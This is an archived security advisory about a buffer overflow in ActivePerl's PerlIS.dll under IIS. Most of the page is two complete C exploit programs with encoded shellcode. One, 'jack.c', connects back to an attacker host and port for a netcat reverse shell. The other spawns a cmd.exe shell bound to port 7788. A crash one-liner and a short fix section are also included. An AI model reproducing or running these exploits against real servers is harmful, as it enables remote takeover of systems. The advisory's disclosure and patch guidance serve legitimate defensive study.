1st Jan 1996 [SBWID-1029]
COMMAND
ActivePerl (PerlScript and Perl-ISAPI)
SYSTEMS AFFECTED
ActivePerl 516 and earlier
ActivePerl 5.6.1.629
PROBLEM
Following is based on ActiveState Security Advisory. PerlScript
and Perl-ISAPI that come with ActivePerl 516 and earlier versions,
inadequately check the length of path information sent to open().
Due to limits on path and filename length in Windows, this can
crash IIS if sufficiently large strings are provided as paths or
filenames.
Update
======
In NSFOCUS Security Advisory(SA2001-07) [www.nsfocus.com], this proves
still vulnerable in v5.6.1.629 :
$ lynx http://host/cgi-bin/`perl -e \'print \"A\" x 360\'`.pl
And IIS dies with buffer overflow ...
Update
======
Exploit :
/* jack.c - Active Perl ISAPI overflow exploit by Indigo
<indigo@exploitingstuff.com> 2001
Usage: jack <victim host> <victim port> <attacker host> <attacker port>
Before executing jack start up a netcat listener with the port set to
\'attacker port\'
eg: nc -l -p \'attacker port\'
You may need to hit return a few times to get the prompt up
main shellcode adapted from jill.c by dark spyrit <dspyrit@beavuh.org>
Greets to:
Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
int x;
unsigned short int a_port;
unsigned long a_host;
unsigned char shellcode[] =
\"\\x47\\x45\\x54\\x20\\x2f\\x63\\x67\\x69\\x2d\\x62\\x69\\x6e\\x2f\" //GET /cgi-bin/
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\" //offset to
return address
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\"
\"\\x42\\x42\\x42\\x8b\\x94\\xf8\\x77\\x42\\x42\\x42\\x42\"
\"\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\\x90\"
\"\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\xd7\\x02\\x50\\x80\\x30\\x95\\x40\\xe2\\xfa\\x2d\\x95\\x95\"
\"\\x64\\xe2\\x14\\xad\\xd8\\xcf\\x05\\x95\\xe1\\x96\\xdd\\x7e\\x60\\x7d\\x95\\x95\\x95\\x95\"
\"\\xc8\\x1e\\x40\\x14\\x7f\\x9a\\x6b\\x6a\\x6a\\x1e\\x4d\\x1e\\xe6\\xa9\\x96\\x66\\x1e\\xe3\"
\"\\xed\\x96\\x66\\x1e\\xeb\\xb5\\x96\\x6e\\x1e\\xdb\\x81\\xa6\\x78\\xc3\\xc2\\xc4\\x1e\\xaa\"
\"\\x96\\x6e\\x1e\\x67\\x2c\\x9b\\x95\\x95\\x95\\x66\\x33\\xe1\\x9d\\xcc\\xca\\x16\\x52\\x91\"
\"\\xd0\\x77\\x72\\xcc\\xca\\xcb\\x1e\\x58\\x1e\\xd3\\xb1\\x96\\x56\\x44\\x74\\x96\\x54\\xa6\"
\"\\x5c\\xf3\\x1e\\x9d\\x1e\\xd3\\x89\\x96\\x56\\x54\\x74\\x97\\x96\\x54\\x1e\\x95\\x96\\x56\"
\"\\x1e\\x67\\x1e\\x6b\\x1e\\x45\\x2c\\x9e\\x95\\x95\\x95\\x7d\\xe1\\x94\\x95\\x95\\xa6\\x55\"
\"\\x39\\x10\\x55\\xe0\\x6c\\xc7\\xc3\\x6a\\xc2\\x41\\xcf\\x1e\\x4d\\x2c\\x93\\x95\\x95\\x95\"
\"\\x7d\\xce\\x94\\x95\\x95\\x52\\xd2\\xf1\\x99\\x95\\x95\\x95\\x52\\xd2\\xfd\\x95\\x95\\x95\"
\"\\x95\\x52\\xd2\\xf9\\x94\\x95\\x95\\x95\\xff\\x95\\x18\\xd2\\xf1\\xc5\\x18\\xd2\\x85\\xc5\"
\"\\x18\\xd2\\x81\\xc5\\x6a\\xc2\\x55\\xff\\x95\\x18\\xd2\\xf1\\xc5\\x18\\xd2\\x8d\\xc5\\x18\"
\"\\xd2\\x89\\xc5\\x6a\\xc2\\x55\\x52\\xd2\\xb5\\xd1\\x95\\x95\\x95\\x18\\xd2\\xb5\\xc5\\x6a\"
\"\\xc2\\x51\\x1e\\xd2\\x85\\x1c\\xd2\\xc9\\x1c\\xd2\\xf5\\x1e\\xd2\\x89\\x1c\\xd2\\xcd\\x14\"
\"\\xda\\xd9\\x94\\x94\\x95\\x95\\xf3\\x52\\xd2\\xc5\\x95\\x95\\x18\\xd2\\xe5\\xc5\\x18\\xd2\"
\"\\xb5\\xc5\\xa6\\x55\\xc5\\xc5\\xc5\\xff\\x94\\xc5\\xc5\\x7d\\x95\\x95\\x95\\x95\\xc8\\x14\"
\"\\x78\\xd5\\x6b\\x6a\\x6a\\xc0\\xc5\\x6a\\xc2\\x5d\\x6a\\xe2\\x85\\x6a\\xc2\\x71\\x6a\\xe2\"
\"\\x89\\x6a\\xc2\\x71\\xfd\\x95\\x91\\x95\\x95\\xff\\xd5\\x6a\\xc2\\x45\\x1e\\x7d\\xc5\\xfd\"
\"\\x94\\x94\\x95\\x95\\x6a\\xc2\\x7d\\x10\\x55\\x9a\\x10\\x3e\\x95\\x95\\x95\\xa6\\x55\\xc5\"
\"\\xd5\\xc5\\xd5\\xc5\\x6a\\xc2\\x79\\x16\\x6d\\x6a\\x9a\\x11\\x02\\x95\\x95\\x95\\x1e\\x4d\"
\"\\xf3\\x52\\x92\\x97\\x95\\xf3\\x52\\xd2\\x97\\x8e\\xac\\x52\\xd2\\x91\\x55\\x3d\\x97\\x94\"
\"\\xff\\x85\\x18\\x92\\xc5\\xc6\\x6a\\xc2\\x61\\xff\\xa7\\x6a\\xc2\\x49\\xa6\\x5c\\xc4\\xc3\"
\"\\xc4\\xc4\\xc4\\x6a\\xe2\\x81\\x6a\\xc2\\x59\\x10\\x55\\xe1\\xf5\\x05\\x05\\x05\\x05\\x15\"
\"\\xab\\x95\\xe1\\xba\\x05\\x05\\x05\\x05\\xff\\x95\\xc3\\xfd\\x95\\x91\\x95\\x95\\xc0\\x6a\"
\"\\xe2\\x81\\x6a\\xc2\\x4d\\x10\\x55\\xe1\\xd5\\x05\\x05\\x05\\x05\\xff\\x95\\x6a\\xa3\\xc0\"
\"\\xc6\\x6a\\xc2\\x6d\\x16\\x6d\\x6a\\xe1\\xbb\\x05\\x05\\x05\\x05\\x7e\\x27\\xff\\x95\\xfd\"
\"\\x95\\x91\\x95\\x95\\xc0\\xc6\\x6a\\xc2\\x69\\x10\\x55\\xe9\\x8d\\x05\\x05\\x05\\x05\\xe1\"
\"\\x09\\xff\\x95\\xc3\\xc5\\xc0\\x6a\\xe2\\x8d\\x6a\\xc2\\x41\\xff\\xa7\\x6a\\xc2\\x49\\x7e\"
\"\\x1f\\xc6\\x6a\\xc2\\x65\\xff\\x95\\x6a\\xc2\\x75\\xa6\\x55\\x39\\x10\\x55\\xe0\\x6c\\xc4\"
\"\\xc7\\xc3\\xc6\\x6a\\x47\\xcf\\xcc\\x3e\\x77\\x7b\\x56\\xd2\\xf0\\xe1\\xc5\\xe7\\xfa\\xf6\"
\"\\xd4\\xf1\\xf1\\xe7\\xf0\\xe6\\xe6\\x95\\xd9\\xfa\\xf4\\xf1\\xd9\\xfc\\xf7\\xe7\\xf4\\xe7\"
\"\\xec\\xd4\\x95\\xd6\\xe7\\xf0\\xf4\\xe1\\xf0\\xc5\\xfc\\xe5\\xf0\\x95\\xd2\\xf0\\xe1\\xc6\"
\"\\xe1\\xf4\\xe7\\xe1\\xe0\\xe5\\xdc\\xfb\\xf3\\xfa\\xd4\\x95\\xd6\\xe7\\xf0\\xf4\\xe1\\xf0\"
\"\\xc5\\xe7\\xfa\\xf6\\xf0\\xe6\\xe6\\xd4\\x95\\xc5\\xf0\\xf0\\xfe\\xdb\\xf4\\xf8\\xf0\\xf1\"
\"\\xc5\\xfc\\xe5\\xf0\\x95\\xd2\\xf9\\xfa\\xf7\\xf4\\xf9\\xd4\\xf9\\xf9\\xfa\\xf6\\x95\\xc2\"
\"\\xe7\\xfc\\xe1\\xf0\\xd3\\xfc\\xf9\\xf0\\x95\\xc7\\xf0\\xf4\\xf1\\xd3\\xfc\\xf9\\xf0\\x95\"
\"\\xc6\\xf9\\xf0\\xf0\\xe5\\x95\\xd0\\xed\\xfc\\xe1\\xc5\\xe7\\xfa\\xf6\\xf0\\xe6\\xe6\\x95\"
\"\\xd6\\xf9\\xfa\\xe6\\xf0\\xdd\\xf4\\xfb\\xf1\\xf9\\xf0\\x95\\xc2\\xc6\\xda\\xd6\\xde\\xa6\"
\"\\xa7\\x95\\xc2\\xc6\\xd4\\xc6\\xe1\\xf4\\xe7\\xe1\\xe0\\xe5\\x95\\xe6\\xfa\\xf6\\xfe\\xf0\"
\"\\xe1\\x95\\xf6\\xf9\\xfa\\xe6\\xf0\\xe6\\xfa\\xf6\\xfe\\xf0\\xe1\\x95\\xf6\\xfa\\xfb\\xfb\"
\"\\xf0\\xf6\\xe1\\x95\\xe6\\xf0\\xfb\\xf1\\x95\\xe7\\xf0\\xf6\\xe3\\x95\\xf6\\xf8\\xf1\\xbb\"
\"\\xf0\\xed\\xf0\\x95\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x33\"
\"\\xc0\\xb0\\x90\\x03\\xd8\\x8b\\x03\\x8b\\x40\\x60\\x33\\xdb\\xb3\\x24\\x03\\xc3\\xff\\xe0\"
\"\\xeb\\xb9\\x90\\x90\\x05\\x31\\x8c\\x6a\"
\"\\x2E\\x70\\x6C\\x20\\x48\\x54\\x54\\x50\\x2F\\x31\\x2E\\x30\\x0D\\x0A\\x0D\\x0A\\x00\";
//.pl HTTP/1.0\\n\\n
printf (\"\\njack - Active Perl ISAPI overflow launcher\\nby Indigo
<indigo@exploitingstuff.com> 2001\\n\\n\");
if (argc < 2)
{
printf (\"Usage: %s <victim host> <victim port> <attacker host> <attacker
port>\\n\", argv[0]);
exit (0);
}
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
a_host = inet_addr(argv[3]);
a_host^=0x95959595;
shellcode[745]= (a_port) & 0xff;
shellcode[746]= (a_port >> 8) & 0xff;
shellcode[750]= (a_host) & 0xff;
shellcode[751]= (a_host >> 8) & 0xff;
shellcode[752]= (a_host >> 16) & 0xff;
shellcode[753]= (a_host >> 24) & 0xff;
WSAStartup (MAKEWORD(2,0), &wsaData);
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons (atoi(argv[2]));
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if (connect(s, (struct sockaddr *)&anAddr, sizeof (struct sockaddr)) == 0)
{
printf (\"Sending exploit....\");
if ((x = send (s, shellcode, strlen(shellcode), 0)) == 0)
{
printf (\"send: error sending first packet\\n\\n\");
exit (0);
}
printf (\"Exploit sent.\\n\\n\");
}
closesocket(s);
}
}
Update
======
Another shell code by xfocus [http://www.xfocus.org] :
*
ActivePerl PerlIS.dll buffer overflow exploit
the hole found by NSFOCUS
exploit code by isno@xfocus.org
http://xfocus.org
tested on win2k+sp0+Activestate ActivePerl 5.6.1.629
----------------------------------------------------------
| ... ... ... | EIP | ... ... ... | SEH | ... ...
----------------------------------------------------------
|_buffer |jmpfwd|callebx|findecb
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment (lib,\"Ws2_32\")
//define the PERL ISAPI name, maybe \".cgi?\"
#define CGINAME \".pl?\"
//shellcode spawns a cmd.exe shell on port 7788
//suit all WIN2K/NT system
unsigned char shellcode[] =
\"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"
\"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"
\"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"
\"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"
\"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"
\"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"
\"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"
\"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"
\"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"
\"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"
\"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"
\"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"
\"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"
\"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"
\"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"
\"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"
\"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"
\"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"
\"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"
\"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"
\"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"
\"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"
\"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"
\"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"
\"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"
\"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"
\"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"
\"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"
\"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"
\"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"
\"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\xa4\"
\"\\x57\\xc7\\x68\\xa0\\xc1\\xc4\\x68\\xc0\\x6f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x5f\"
\"\\xa4\\x57\\xc7\\x23\\x93\\xc7\\xc1\\xc4\\x68\\xc0\\x6b\\xc0\\xa4\\x5e\\xc6\\xc7\"
\"\\xc1\\x68\\xe0\\x3b\\x68\\xc0\\x4f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x3d\\xc7\\x68\"
\"\\xc0\\x73\\x7c\\x69\\xcf\\xc7\\x1e\\xd5\\x65\\x54\\x1c\\xd3\\xb3\\x9b\\x92\\x2f\"
\"\\x97\\x97\\x97\\x50\\x97\\xef\\xc1\\xa3\\x85\\xa4\\x57\\x54\\x7c\\x7b\\x7f\\x75\"
\"\\x6a\\x68\\x68\\x7f\\x05\\x69\\x68\\x68\\xdc\\xc1\\x70\\xe0\\xb4\\x17\\x70\\xe0\"
\"\\xdb\\xf8\\xf6\\xf3\\xdb\\xfe\\xf5\\xe5\\xf6\\xe5\\xee\\xd6\\x97\\xdc\\xd2\\xc5\"
\"\\xd9\\xd2\\xdb\\xa4\\xa5\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xfe\\xe7\\xf2\"
\"\\x97\\xd0\\xf2\\xe3\\xc4\\xe3\\xf6\\xe5\\xe3\\xe2\\xe7\\xde\\xf9\\xf1\\xf8\\xd6\"
\"\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\xd6\\x97\"
\"\\xd4\\xfb\\xf8\\xe4\\xf2\\xdf\\xf6\\xf9\\xf3\\xfb\\xf2\\x97\\xc7\\xf2\\xf2\\xfc\"
\"\\xd9\\xf6\\xfa\\xf2\\xf3\\xc7\\xfe\\xe7\\xf2\\x97\\xd0\\xfb\\xf8\\xf5\\xf6\\xfb\"
\"\\xd6\\xfb\\xfb\\xf8\\xf4\\x97\\xc0\\xe5\\xfe\\xe3\\xf2\\xd1\\xfe\\xfb\\xf2\\x97\"
\"\\xc5\\xf2\\xf6\\xf3\\xd1\\xfe\\xfb\\xf2\\x97\\xc4\\xfb\\xf2\\xf2\\xe7\\x97\\xd2\"
\"\\xef\\xfe\\xe3\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\x97\\x97\\xc0\\xc4\\xd8\\xd4\"
\"\\xdc\\xa4\\xa5\\x97\\xe4\\xf8\\xf4\\xfc\\xf2\\xe3\\x97\\xf5\\xfe\\xf9\\xf3\\x97\"
\"\\xfb\\xfe\\xe4\\xe3\\xf2\\xf9\\x97\\xf6\\xf4\\xf4\\xf2\\xe7\\xe3\\x97\\xe4\\xf2\"
\"\\xf9\\xf3\\x97\\xe5\\xf2\\xf4\\xe1\\x97\\x95\\x97\\x89\\xfb\\x97\\x97\\x97\\x97\"
\"\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\xf4\\xfa\\xf3\\xb9\\xf2\\xef\\xf2\\x97\"
\"\\x68\\x68\\x68\\x68\";
/*
jump to ECB->QUERY_STRING
sub ebx,394h
mov esp,ebx
pop eax
add eax,64h
mov esp,eax
pop eax
push eax
ret
*/
//the code must suit the URL encoding,
//for this reason,many ASM code cannot be used,
//it is really difficult to work out thiz
unsigned char findecb[]=
\"\\x90\\x83\\xeb\\x7e\\x90\\x83\\xeb\\x7e\\x90\\x83\\xeb\\x7e\\x90\\x83\\xeb\\x7e\"
\"\\x90\\x83\\xeb\\x7e\\x90\\x83\\xeb\\x7e\\x90\\x83\\xeb\\x50\\x90\\x83\\xeb\\x50\"
\"\\x90\\x8b\\xe3\\x90\\x90\\x90\\x90\\x90\\x58\\x83\\xc0\\x64\\x90\\x8b\\xe0\\x90\"
\"\\x90\\x90\\x90\\x90\\x58\\x50\\xc3\";
//call ebx must suit URL encoding too
//common jmpebx&callebx cannot be used
unsigned char callebx0[]=\"\\x33\\x45\\xaa\\x77\";
unsigned char callebx2[]=\"\\x61\\x62\\x55\\x88\";
unsigned char jmpforward[]=\"\\xeb\\x06\";
void usage(char *pgm);
int main(int argc, char *argv[])
{
unsigned char buff[4096];
unsigned char sendbuff[4096];
int shellcodelen;
int i,s;
int sptype = 0;
unsigned short int webport = 80;
struct hostent *ht;
struct sockaddr_in sin;
WSADATA WSAData;
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf(\"WSAStartup failed.\\n\");
WSACleanup();
exit(1);
}
if(argc < 2 || argc > 3)
{
usage(argv[0]);
}
if(argc == 3)
sptype = atoi(argv[2]);
if((ht = gethostbyname(argv[1])) == 0)
{
printf(\"Unable to resolve host %s\\n\",argv[1]);
exit(1);
}
sin.sin_port = htons(webport);
shellcodelen=strlen(shellcode);
memset(buff,0x90,sizeof(buff));
memcpy(buff,\"/cgi-bin/\",9);
memcpy(buff+404-4,jmpforward,2);
if(sptype == 0)
memcpy(buff+404,callebx0,4);
else
memcpy(buff+404,callebx2,4);
memcpy(buff+404+4,findecb,strlen(findecb));
memcpy(buff+404+4+64,CGINAME,strlen(CGINAME));
memcpy(buff+404+4+64+strlen(CGINAME),shellcode,shellcodelen+1);
memset(sendbuff,0,4096);
_snprintf(sendbuff,4096,\"GET %s HTTP/1.0\\r\\n\\r\\n\",buff);
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf(\"Unable to set up socket\\n\");
exit(1);
}
if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
printf(\"Unable to connect\\n\");
exit(1);
}
else
printf(\"Connected...\\n\");
Sleep(1000);
printf(\"send shellcode...\\n\");
if(send(s, sendbuff, strlen(sendbuff), 0) == -1)
{
printf(\"Unable to send\\n\");
exit(1);
}
Sleep(1000);
i=1;
ioctlsocket(s,FIONBIO,&i);
memset(sendbuff,0,sizeof(sendbuff));
recv(s,sendbuff,1024,0);
if(strstr(sendbuff,\"404\")!=NULL)
{
printf(\"the target is not vulnerable\\n\");
closesocket(s);
return 1;
}
closesocket(s);
printf(\"all done!\\nyou can telnet %s 7788\\n\",argv[1]);
return 0;
}
void usage(char *pgm)
{
printf(\"Usage: %s <hostname> [SP]\\n\", pgm);
printf(\" SP: Service Pack (0 or 2, default is 0)\\n\");
printf(\"example: %s 127.0.0.1 2\\n\", pgm);
exit(1);
}
SOLUTION
This is fixed in ActivePerl 517. If you are unable to upgrade to
ActivePerl 517 then all path information should be checked for
sane lengths before being passed to open(). The maximum length
of a path, including drive, directory and filename is 259
characters. The maximum length of the filename portion of a path
is 255 characters. The maximum length of the directory portion
of a path is 255 characters. Example:
$filename = substr $filename, 0, 255;
open FOO, \">$filename\";
Alternatively make shure you checked the option to verify that file
exists before running in \"perlIS.dll\" ISAPI extension of IIS MMC.
Latest version of ActivePerl is available at
http://www.activestate.com/Products/ActivePerl/download.plex
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
